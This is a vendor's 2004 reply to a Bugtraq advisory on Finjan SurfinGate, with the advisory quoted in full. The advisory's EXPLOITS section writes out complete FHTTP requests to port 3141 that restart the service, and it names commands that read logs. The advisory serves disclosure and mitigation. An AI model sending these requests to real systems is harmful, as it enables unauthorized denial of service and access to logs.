Finjan Response to David Byrne's "Finjan SurfinGate Vulnerability" Dated January 23, 2004 David Byrne contacted Finjan Software a year ago, and based on his comments we issued a detailed alert to our customers. We explained that the control port is NOT used to change security policies within our software. David's suggested vulnerability is limited to a DoS attack, and it can be easily eliminated by a small change in the system configuration. David's most recent comment is: "Inside the SurfinGate policy, add URL rules to block all access to any hostname or IP address that would connect to the FHTTP port. This can be a long list; localhost, 127.0.0.1, the hostname, loghost for Solaris machines, the IP address SurfinGate binds to, any DNS entries, etc." Once again, this suggested vulnerability is easily addressed. The solution is to simply block any connection to "*:ControlPort" (3141 is the default). Finjan welcomes expert input and suggestions. Please feel free to contact us at support@finjan.com. -- Regards, Menashe Eliezer Manager, Malicious Code Research Center Finjan Software http://www.finjan.com/mcrc Prevention is the best cure! -----Original Message----- From: David Byrne [mailto:davidribyrne@yahoo.com] Sent: Friday, January 23, 2004 5:04 AM To: bugtraq@securityfocus.com Subject: Finjan SurfinGate Vulnerability VENDOR: Finjan (www.finjan.com) PRODUCT: SurfinGate (recently renamed "Vital Security") VERSIONS: All releases of versions 6 & 7 as of 1/22/2004. Older versions have not been tested. NOTIFICATION: The vendor has known of the problem over a year DESCRIPTION ========================================================== Finjan SurfinGate provides malicious code scanning for web traffic. It focuses on behavior-based filtering of active content (e.g. ActiveX, Java, scripting), but also integrates a McAfee virus scanner. PROBLEM ========================================================== When running in proxy mode, properly crafted requests sent to Finjan SurfinGate can mimic control commands. Known vulnerabilities include viewing log data and causing the service to restart, potentially resulting in a DoS situation. The application's architecture suggests there is a potential for modifying the filtering policy as well. DETAILS ========================================================== SurfinGate scanning servers receive commands by listening on a control port (TCP/3141 by default) for an HTTP-based protocol called "FHTTP". Normally the FHTTP commands come from a management console or policy database server, but commands are not authenticated and can come from any source, including the local HTTP proxy. This allows any user to issue server commands via the proxy server. The "finjan-parameter-type" parameter is the actual command. Known commands include "restart" to restart the service, "getlastmsg" to view log information and "online" to force a policy update from the database server. Running "strings" on the server binary ("bin/FinjanServer") reveals other possible targets. EXPLOITS ========================================================== Below are two examples of sessions with the proxy server that issue a restart command. Example 1: >>> CONNECT LOCALHOST:3141 HTTP/1.0 >>> <<< HTTP/1.0 200 Connection established <<< Proxy-agent: Finjan-SurfinGate/6.0 <<< >>> FINJAN /stam HTTP/1.0 >>> finjan-version: fhttp/1.0 >>> finjan-command: custom >>> finjan-parameter-category: console >>> finjan-parameter-type: restart >>> content-length: 0 >>> <<< HTTP/1.0 200 OK <<< finjan-version: fhttp/1.0 <<< <<< Example 2: >>> FINJAN localhost:3141/stam HTTP/1.0 >>> finjan-version: fhttp/1.0 >>> finjan-command: custom >>> finjan-parameter-category: console >>> finjan-parameter-type: restart >>> content-length: 0 >>> <<< HTTP/1.0 200 OK <<< finjan-version: fhttp/1.0 <<< <<< WORKAROUNDS ========================================================== Firewall filtering will is not adequate since the commands come over the same port that services legitimate HTTP requests. These are possible workarounds that have been successfully tested. * Use a proxy server between the user and SurfinGate server to block CONNECT commands to ports other than 443 AND block non-standard HTTP commands (i.e. "FINJAN"). * Inside the SurfinGate policy, add URL rules to block all access to any hostname or IP address that would connect to the FHTTP port. This can be a long list; localhost, 127.0.0.1, the hostname, loghost for Solaris machines, the IP address SurfinGate binds to, any DNS entries, etc. * Change the control port to something besides 3141. This is pretty weak, but better than nothing. NOTES ========================================================== Just to reiterate, the ability to change the policy has not been confirmed, but seems likely. The SurfinGate database server and SurfinShield (a desktop product) database server also use FHTTP for management commands, so that is a likely source for more vulnerabilities to explore. Because the SurfinGate scanning/proxy server has to communicate with the database server using FHTTP, there is guaranteed access to the database via the proxy if the hostname or IP address is known. The workarounds listed above should also work for restricting access to the database server, but have not been tested. ************************************************************************************ Finjan Software This e-mail and any attached files are confidential and may be legally privileged. The unauthorized use, disclosure or copying of this email or any information contained within it is strictly prohibited. This also confirms that Finjan Software's SurfinGate for E-Mail has scanned this message for the presence of known viruses and potentially malicious code. Finjan Software - Prevention is the Best Cure! ************************************************************************************
